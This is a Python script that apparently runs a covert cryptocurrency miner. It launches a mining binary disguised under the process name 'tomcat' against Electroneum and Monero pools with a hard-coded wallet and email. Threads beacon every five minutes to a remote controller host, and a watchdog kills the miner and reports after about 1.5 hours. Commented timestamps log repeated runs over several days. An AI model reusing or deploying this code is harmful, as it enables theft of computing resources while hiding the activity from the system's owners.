import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:50:06.930819
#2018-02-17 16:38:03.827331
#2018-02-17 18:25:08.049029
#2018-02-17 20:13:06.847469
#2018-02-17 22:01:06.417601
#2018-02-17 23:45:07.600621
#2018-02-18 01:36:05.035052
#2018-02-18 03:23:06.719159
#2018-02-18 05:12:06.129742
#2018-02-18 07:04:06.066347
#2018-02-18 08:52:05.993697
#2018-02-18 10:38:04.427986
#2018-02-18 12:23:04.721167
#2018-02-18 14:11:01.228554
#2018-02-18 16:01:05.260500
#2018-02-18 17:50:06.111057
#2018-02-18 19:37:01.306816
#2018-02-18 21:22:05.453443
#2018-02-18 23:11:06.699250
#2018-02-19 00:57:06.308440
#2018-02-19 02:44:06.292651
#2018-02-19 04:31:05.104362
#2018-02-19 06:16:01.882504
#2018-02-19 08:04:05.286511
#2018-02-19 09:54:07.060571
#2018-02-19 11:42:09.530930
#2018-02-19 13:29:01.456828
#2018-02-19 15:17:07.522629
#2018-02-19 17:05:10.228657
#2018-02-19 18:51:01.632785
#2018-02-19 20:38:04.356960
#2018-02-19 22:24:08.153871
#2018-02-20 00:10:07.915874
#2018-02-20 01:56:07.147195
#2018-02-20 03:47:05.389258
#2018-02-20 05:33:03.598893
#2018-02-20 07:17:03.998798
#2018-02-20 09:04:06.381748
#2018-02-20 10:47:04.177687
#2018-02-20 12:34:06.138528
#2018-02-20 14:21:06.312557
#2018-02-20 16:07:06.369032
#2018-02-20 17:52:04.582392
#2018-02-20 19:43:07.213627
#2018-02-20 21:31:06.497771
#2018-02-20 23:14:06.484165
#2018-02-21 00:59:04.274838
#2018-02-21 02:46:03.667190
#2018-02-21 04:36:01.251599
#2018-02-21 06:23:05.159483
#2018-02-21 08:08:04.146971
#2018-02-21 09:54:01.890980
#2018-02-21 11:42:09.903738
#2018-02-21 13:33:08.838050
#2018-02-21 15:17:08.301103
#2018-02-21 17:07:07.242429
#2018-02-21 18:53:01.759310
#2018-02-21 20:43:01.640661
#2018-02-21 22:28:08.522533
#2018-02-22 00:19:05.241432
#2018-02-22 02:05:07.039623
#2018-02-22 03:51:04.544740
#2018-02-22 05:39:03.932497
#2018-02-22 07:24:05.395893
#2018-02-22 09:11:02.425349
#2018-02-22 10:59:08.027779
#2018-02-22 12:46:04.620080
#2018-02-22 14:32:07.259925
#2018-02-22 16:17:05.263801
#2018-02-22 18:05:09.803110
#2018-02-22 19:53:06.781823
#2018-02-22 21:41:06.747639
#2018-02-22 23:29:07.835196
#2018-02-23 01:17:04.216840
#2018-02-23 03:03:05.270038
#2018-02-23 04:51:04.860982
#2018-02-23 06:36:04.106073
#2018-02-23 08:24:01.812314
#2018-02-23 10:39:05.678895
#2018-02-23 12:33:02.021142
#2018-02-23 14:19:07.617000
#2018-02-23 16:10:13.386928
#2018-02-23 17:56:06.996088
#2018-02-23 19:41:05.904589
#2018-02-23 21:23:07.336870
#2018-02-23 23:10:06.071626
#2018-02-24 00:56:06.881913
#2018-02-24 02:50:06.590381
#2018-02-24 05:28:04.589231
#2018-02-24 07:15:09.100981
#2018-02-24 09:06:03.962105
#2018-02-24 10:46:01.720001
#2018-02-24 12:31:02.125745
#2018-02-24 14:03:05.592529
#2018-02-24 15:37:06.274655
#2018-02-24 17:20:06.282237
#2018-02-24 18:54:03.936878
#2018-02-24 20:26:01.551413
#2018-02-25 01:13:08.003595
#2018-02-25 05:04:01.495230
#2018-02-25 10:04:01.858197